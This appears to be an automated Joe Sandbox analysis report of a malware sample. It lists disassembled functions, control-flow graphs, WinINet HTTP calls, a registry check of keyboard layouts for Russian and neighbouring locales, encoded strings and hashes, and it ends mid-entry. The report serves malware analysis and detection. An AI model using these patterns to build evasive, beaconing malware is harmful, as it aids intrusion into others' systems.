                      • Instruction ID: 9e4f9847170ddf7d312be42a7c56d3467d37685868fc75545aeda9e15683a00d
                      • Opcode Fuzzy Hash: 52b6dc3889e5cfbdd32bc4c8029dc9cbe87a5ea4a9ce38dbfca98333e2a29e71
                      • Instruction Fuzzy Hash: BC91A3B19001189BDF28EB64DC85BEDB779EB45304F4046EDE50997282EA789FC4CFA4
                      Function 007A46C0 Relevance: 35.5, APIs: 1, Strings: 21, Instructions: 2484COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 007A7870: __Cnd_unregister_at_thread_exit.LIBCPMT ref: 007A795C
                        • Part of subcall function 007A7870: __Cnd_destroy_in_situ.LIBCPMT ref: 007A7968
                        • Part of subcall function 007A7870: __Mtx_destroy_in_situ.LIBCPMT ref: 007A7971
                        • Part of subcall function 0079BD60: InternetOpenW.WININET(007E8D70,00000000,00000000,00000000,00000000), ref: 0079BDED
                        • Part of subcall function 0079BD60: InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0079BE11
                        • Part of subcall function 0079BD60: HttpOpenRequestA.WININET(?,00000000), ref: 0079BE5B
                      • std::_Xinvalid_argument.LIBCPMT ref: 007A4EA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequestXinvalid_argumentstd::_
                      • String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range
                      • API String ID: 2414744145-1662704651
                      • Opcode ID: 2f144420214d22028567090664c9a10cfbe1f0696dc088af709ac0281a006ed5
                      • Instruction ID: 6958c519fe89293dffe3ced0fd77af8735ae057de33add5b9ea291249a95cb73
                      • Opcode Fuzzy Hash: 2f144420214d22028567090664c9a10cfbe1f0696dc088af709ac0281a006ed5
                      • Instruction Fuzzy Hash: 6723F371E00158DBEB19DB28CD8979DBB769BC2304F548298E0096B2C6EB7D5F84CF51
                      Function 00795DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 918 795df0-795eee 924 795f18-795f25 call 7acf21 918->924 925 795ef0-795efc 918->925 926 795f0e-795f15 call 7ad593 925->926 927 795efe-795f0c 925->927 926->924 927->926 929 795f26-7960ad call 7c6b9a call 7ae080 call 7a7f30 * 5 RegOpenKeyExA 927->929 947 796478-796481 929->947 948 7960b3-796143 call 7c4020 929->948 949 7964ae-7964b7 947->949 950 796483-79648e 947->950 972 796149-79614d 948->972 973 796466-796472 948->973 954 7964b9-7964c4 949->954 955 7964e4-7964ed 949->955 952 796490-79649e 950->952 953 7964a4-7964ab call 7ad593 950->953 952->953 959 79659e-7965a3 call 7c6b9a 952->959 953->949 961 7964da-7964e1 call 7ad593 954->961 962 7964c6-7964d4 954->962 957 79651a-796523 955->957 958 7964ef-7964fa 955->958 967 79654c-796555 957->967 968 796525-796530 957->968 964 7964fc-79650a 958->964 965 796510-796517 call 7ad593 958->965 961->955 962->959 962->961 964->959 964->965 965->957 978 796582-79659d call 7acf21 967->978 979 796557-796566 967->979 976 796542-796549 call 7ad593 968->976 977 796532-796540 968->977 980 796460 972->980 981 796153-796187 RegEnumValueW 972->981 973->947 976->967 977->959 977->976 985 796578-79657f call 7ad593 979->985 986 796568-796576 979->986 980->973 988 79644d-796454 981->988 989 79618d-7961ad 981->989 985->978 986->959 986->985 988->981 993 79645a 988->993 995 7961b0-7961b9 989->995 993->980 995->995 996 7961bb-79624d call 7a7c50 call 7a8090 call 7a7870 * 2 call 795c60 995->996 996->988
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                      • API String ID: 0-3963862150
                      • Opcode ID: 77193c3918f65ff775ea90755d534885d7c91aeae58fb90752fa6b3e2984db89
                      • Instruction ID: 3efab643e4685f98cd825c80380caa1db2201a8ca190132509adba2b06cef156
                      • Opcode Fuzzy Hash: 77193c3918f65ff775ea90755d534885d7c91aeae58fb90752fa6b3e2984db89
                      • Instruction Fuzzy Hash: F2E18E71900218ABEF25DFA4CC89BDEB779AB05304F5042D9E409A7291E778AFC4CF51
                      Function 00797D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1006 797d00-797d82 call 7c4020 1010 797d88-797db0 call 7a7870 call 795b20 1006->1010 1011 79827e-79829b call 7acf21 1006->1011 1018 797db2 1010->1018 1019 797db4-797dd6 call 7a7870 call 795b20 1010->1019 1018->1019 1024 797dd8 1019->1024 1025 797dda-797df3 1019->1025 1024->1025 1028 797df5-797e04 1025->1028 1029 797e24-797e4f 1025->1029 1032 797e1a-797e21 call 7ad593 1028->1032 1033 797e06-797e14 1028->1033 1030 797e51-797e60 1029->1030 1031 797e80-797ea1 1029->1031 1034 797e62-797e70 1030->1034 1035 797e76-797e7d call 7ad593 1030->1035 1036 797ea3-797ea5 GetNativeSystemInfo 1031->1036 1037 797ea7-797eac 1031->1037 1032->1029 1033->1032 1038 79829c call 7c6b9a 1033->1038 1034->1035 1034->1038 1035->1031 1041 797ead-797eb6 1036->1041 1037->1041 1048 7982a1-7982a6 call 7c6b9a 1038->1048 1046 797eb8-797ebf 1041->1046 1047 797ed4-797ed7 1041->1047 1050 798279 1046->1050 1051 797ec5-797ecf 1046->1051 1052 797edd-797ee6 1047->1052 1053 79821f-798222 1047->1053 1050->1011 1056 798274 1051->1056 1057 797ef9-797efc 1052->1057 1058 797ee8-797ef4 1052->1058 1053->1050 1054 798224-79822d 1053->1054 1059 79822f-798233 1054->1059 1060 798254-798257 1054->1060 1056->1050 1061 7981fc-7981fe 1057->1061 1062 797f02-797f09 1057->1062 1058->1056 1063 798248-798252 1059->1063 1064 798235-79823a 1059->1064 1067 798259-798263 1060->1067 1068 798265-798271 1060->1068 1069 79820c-79820f 1061->1069 1070 798200-79820a 1061->1070 1065 797fe9-7981e5 call 7a7870 call 795b20 call 7a7870 call 795b20 call 795c60 call 7a7870 call 795b20 call 795640 call 7a7870 call 795b20 call 7a7870 call 795b20 call 795c60 call 7a7870 call 795b20 call 795640 call 7a7870 call 795b20 call 7a7870 call 795b20 call 795c60 call 7a7870 call 795b20 call 795640 1062->1065 1066 797f0f-797f6b call 7a7870 call 795b20 call 7a7870 call 795b20 call 795c60 1062->1066 1063->1050 1064->1063 1071 79823c-798246 1064->1071 1105 7981eb-7981f4 1065->1105 1092 797f70-797f77 1066->1092 1067->1050 1068->1056 1069->1050 1074 798211-79821d 1069->1074 1070->1056 1071->1050 1074->1056 1094 797f79 1092->1094 1095 797f7b-797f9b call 7c8a81 1092->1095 1094->1095 1100 797f9d-797fac 1095->1100 1101 797fd2-797fd4 1095->1101 1103 797fae-797fbc 1100->1103 1104 797fc2-797fcf call 7ad593 1100->1104 1101->1105 1106 797fda-797fe4 1101->1106 1103->1048 1103->1104 1104->1101 1105->1053 1110 7981f6 1105->1110 1106->1105 1110->1061
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00797EA3
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                      • API String ID: 1721193555-2057465332
                      • Opcode ID: b6359a007f6538a88fcf9db4b8698a3429e4e7f873801763d1779ef2b56fb964
                      • Instruction ID: f17dcf1d98f551a072d00b3b487bf9683a689bb9af575d6770230e802b150e7b
                      • Opcode Fuzzy Hash: b6359a007f6538a88fcf9db4b8698a3429e4e7f873801763d1779ef2b56fb964
                      • Instruction Fuzzy Hash: 61D1C5B1E04618DBDF14FB28EC4A3AD7761AB42320F544288E4156B3C2DB7D9E81CBD2
                      Function 007C6E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1221 7c6e01-7c6e36 GetFileType 1222 7c6e3c-7c6e47 1221->1222 1223 7c6eee-7c6ef1 1221->1223 1226 7c6e69-7c6e85 call 7c4020 GetFileInformationByHandle 1222->1226 1227 7c6e49-7c6e5a call 7c7177 1222->1227 1224 7c6f1a-7c6f42 1223->1224 1225 7c6ef3-7c6ef6 1223->1225 1230 7c6f5f-7c6f61 1224->1230 1231 7c6f44-7c6f57 1224->1231 1225->1224 1228 7c6ef8-7c6efa 1225->1228 1235 7c6f0b-7c6f18 call 7c740d 1226->1235 1240 7c6e8b-7c6ecd call 7c70c9 call 7c6f71 * 3 1226->1240 1242 7c6f07-7c6f09 1227->1242 1243 7c6e60-7c6e67 1227->1243 1234 7c6efc-7c6f01 call 7c7443 1228->1234 1228->1235 1233 7c6f62-7c6f70 call 7acf21 1230->1233 1231->1230 1248 7c6f59-7c6f5c 1231->1248 1234->1242 1235->1242 1257 7c6ed2-7c6eea call 7c7096 1240->1257 1242->1233 1243->1226 1248->1230 1257->1230 1260 7c6eec 1257->1260 1260->1242
                      APIs
                      • GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 007C6E23
                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 007C6E7D
                      • __dosmaperr.LIBCMT ref: 007C6F12
                        • Part of subcall function 007C7177: __dosmaperr.LIBCMT ref: 007C71AC
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: File__dosmaperr$HandleInformationType
                      • String ID:
                      • API String ID: 2531987475-0
                      • Opcode ID: 78926e1b748042fcbe6a97926c7977280f5ce5a5688c2f6e85a55fd744d7793b
                      • Instruction ID: 35dbb786aa96dd213e12236e8b331e2bacf2074627bc3950ad2a5330c0452fe8
                      • Opcode Fuzzy Hash: 78926e1b748042fcbe6a97926c7977280f5ce5a5688c2f6e85a55fd744d7793b
                      • Instruction Fuzzy Hash: E1414F75900644ABDB24EFB5E885EAFBBF9EF88300B10441DF856D3210EB34A944CB61
                      Function 007CD4F4 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 198COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1298 7cd4f4-7cd515 call 7adeb0 1301 7cd52f-7cd532 1298->1301 1302 7cd517 1298->1302 1303 7cd54e-7cd55a call 7ca688 1301->1303 1305 7cd534-7cd537 1301->1305 1302->1303 1304 7cd519-7cd51f 1302->1304 1315 7cd55c-7cd55f 1303->1315 1316 7cd564-7cd570 call 7cd47e 1303->1316 1307 7cd521-7cd525 1304->1307 1308 7cd543-7cd54c call 7cd43c 1304->1308 1305->1308 1309 7cd539-7cd53c 1305->1309 1307->1303 1311 7cd527-7cd52b 1307->1311 1323 7cd58c-7cd595 1308->1323 1312 7cd53e-7cd541 1309->1312 1313 7cd572-7cd582 call 7c7443 call 7c6b8a 1309->1313 1311->1313 1317 7cd52d 1311->1317 1312->1308 1312->1313 1313->1315 1320 7cd6cb-7cd6da 1315->1320 1316->1313 1330 7cd584-7cd589 1316->1330 1317->1308 1326 7cd597-7cd59f call 7c8c8b 1323->1326 1327 7cd5a2-7cd5b3 1323->1327 1326->1327 1328 7cd5c9 1327->1328 1329 7cd5b5-7cd5c7 1327->1329 1333 7cd5cb-7cd5dc 1328->1333 1329->1333 1330->1323 1335 7cd5de-7cd5e0 1333->1335 1336 7cd64a-7cd65a call 7cd687 1333->1336 1338 7cd6db-7cd6dd 1335->1338 1339 7cd5e6-7cd5e8 1335->1339 1346 7cd65c-7cd65e 1336->1346 1347 7cd6c9 1336->1347 1343 7cd6df-7cd6e6 call 7c8cd3 1338->1343 1344 7cd6e7-7cd6fa call 7c651d 1338->1344 1341 7cd5ea-7cd5ed 1339->1341 1342 7cd5f4-7cd600 1339->1342 1341->1342 1348 7cd5ef-7cd5f2 1341->1348 1349 7cd640-7cd648 1342->1349 1350 7cd602-7cd617 call 7cd4eb * 2 1342->1350 1343->1344 1364 7cd6fc-7cd706 1344->1364 1365 7cd708-7cd70e 1344->1365 1353 7cd699-7cd6a2 1346->1353 1354 7cd660-7cd676 call 7ca531 1346->1354 1347->1320 1348->1342 1355 7cd61a-7cd61c 1348->1355 1349->1336 1350->1355 1373 7cd6a5-7cd6a8 1353->1373 1354->1373 1355->1349 1361 7cd61e-7cd62e 1355->1361 1363 7cd630-7cd635 1361->1363 1363->1336 1368 7cd637-7cd63e 1363->1368 1364->1365 1369 7cd73c-7cd747 call 7c7443 1364->1369 1370 7cd727-7cd738 RtlAllocateHeap 1365->1370 1371 7cd710-7cd711 1365->1371 1368->1363 1381 7cd749-7cd74b 1369->1381 1374 7cd73a 1370->1374 1375 7cd713-7cd71a call 7c9c81 1370->1375 1371->1370 1379 7cd6aa-7cd6ad 1373->1379 1380 7cd6b4-7cd6bc 1373->1380 1374->1381 1375->1369 1387 7cd71c-7cd725 call 7c8cf9 1375->1387 1379->1380 1384 7cd6af-7cd6b2 1379->1384 1380->1347 1385 7cd6be-7cd6c6 call 7ca531 1380->1385 1384->1347 1384->1380 1385->1347 1387->1369 1387->1370
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: hpG|
                      • API String ID: 0-1840024693
                      • Opcode ID: a9bcbed6c95320603dc144d008a86ea57a1a89f194355d2d18e7719068753dc9
                      • Instruction ID: 43c98e319c64ee642dcb57e4ff6757dd963bc152974fe6c3b3d0766443ed8590
                      • Opcode Fuzzy Hash: a9bcbed6c95320603dc144d008a86ea57a1a89f194355d2d18e7719068753dc9
                      • Instruction Fuzzy Hash: DD61D272D012149BDF35EFA8E889FADB7A0AB55354F24813EE449BB250D7399D00CB61
                      Function 007982B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1392 7982b0-798331 call 7c4020 1396 79833d-798365 call 7a7870 call 795b20 1392->1396 1397 798333-798338 1392->1397 1405 798369-79838b call 7a7870 call 795b20 1396->1405 1406 798367 1396->1406 1398 79847f-79849b call 7acf21 1397->1398 1411 79838d 1405->1411 1412 79838f-7983a8 1405->1412 1406->1405 1411->1412 1415 7983d9-798404 1412->1415 1416 7983aa-7983b9 1412->1416 1417 798431-798452 1415->1417 1418 798406-798415 1415->1418 1419 7983bb-7983c9 1416->1419 1420 7983cf-7983d6 call 7ad593 1416->1420 1424 798458-79845d 1417->1424 1425 798454-798456 GetNativeSystemInfo 1417->1425 1422 798427-79842e call 7ad593 1418->1422 1423 798417-798425 1418->1423 1419->1420 1426 79849c-7984a1 call 7c6b9a 1419->1426 1420->1415 1422->1417 1423->1422 1423->1426 1430 79845e-798465 1424->1430 1425->1430 1430->1398 1434 798467-79846f 1430->1434 1435 798478-79847b 1434->1435 1436 798471-798476 1434->1436 1435->1398 1437 79847d 1435->1437 1436->1398 1437->1398
                      APIs
                      • GetNativeSystemInfo.KERNELBASE(?), ref: 00798454
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: 62d04cdf516f6e0a0051517e3f6434c51390817baae85f9cdb3943400e41a41c
                      • Instruction ID: 575d7a7446970241dc19b6c1e9c69b8a718e2a07adce4797fc4556e7c26c22fd
                      • Opcode Fuzzy Hash: 62d04cdf516f6e0a0051517e3f6434c51390817baae85f9cdb3943400e41a41c
                      • Instruction Fuzzy Hash: 41512771D002589BEF24EF28DD49BEDB7759F46310F504299E804A73D2EB399E808B92
                      Function 007C6C99 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1438 7c6c99-7c6ca5 1439 7c6cc4-7c6ce8 call 7c4020 1438->1439 1440 7c6ca7-7c6cc3 call 7c7430 call 7c7443 call 7c6b8a 1438->1440 1445 7c6cea-7c6d04 call 7c7430 call 7c7443 call 7c6b8a 1439->1445 1446 7c6d06-7c6d28 CreateFileW 1439->1446 1470 7c6d72-7c6d76 1445->1470 1450 7c6d38-7c6d3f call 7c6d77 1446->1450 1451 7c6d2a-7c6d2e call 7c6e01 1446->1451 1460 7c6d40-7c6d42 1450->1460 1456 7c6d33-7c6d36 1451->1456 1456->1460 1462 7c6d64-7c6d67 1460->1462 1463 7c6d44-7c6d61 call 7c4020 1460->1463 1466 7c6d69-7c6d6f 1462->1466 1467 7c6d70 1462->1467 1463->1462 1466->1467 1467->1470
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8b39471fc451e58a8164ae456a56455a4c8530f08670fa8e2801b5f6dc47529e
                      • Instruction ID: f62f9da517b7a151855650982c0c51ef8e4dffbacbce6d666d50696d8221f127
                      • Opcode Fuzzy Hash: 8b39471fc451e58a8164ae456a56455a4c8530f08670fa8e2801b5f6dc47529e
                      • Instruction Fuzzy Hash: C5213772A05608BAEF117B649C86FAF37299F41778F20035CF9243B1D1DB789E0196A1
                      Function 007C6F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1472 7c6f71-7c6f87 1473 7c6f89-7c6f8d 1472->1473 1474 7c6f97-7c6fa7 1472->1474 1473->1474 1475 7c6f8f-7c6f95 1473->1475 1478 7c6fa9-7c6fbb SystemTimeToTzSpecificLocalTime 1474->1478 1479 7c6fe7-7c6fea 1474->1479 1476 7c6fec-7c6ff7 call 7acf21 1475->1476 1478->1479 1481 7c6fbd-7c6fdd call 7c6ff8 1478->1481 1479->1476 1484 7c6fe2-7c6fe5 1481->1484 1484->1476
                      APIs
                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 007C6FB3
                      Memory Dump Source
                      • Source File: 00000004.00000002.2603420342.0000000000791000.00000040.00000001.01000000.00000008.sdmp, Offset: 00790000, based on PE: true
                      • Associated: 00000004.00000002.2603398565.0000000000790000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603420342.00000000007F2000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603504694.00000000007F9000.00000004.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.00000000007FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.000000000098C000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A6D000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000A9F000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AA6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2603524043.0000000000AB6000.00000040.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605045981.0000000000AB7000.00000080.00000001.01000000.00000008.sdmpDownload File
                      • Associated: 00000004.00000002.2605192224.0000000000C5E000.00000040.00000001.01000000.00000008.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_790000_axplong.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$LocalSpecificSystem
                      • String ID:
                      • API String ID: 2574697306-0
                      • Opcode ID: 9b132883f0ce5fdf0d22d4a45ed9c36f9198213223aca0fa4514129e9fa87fc9
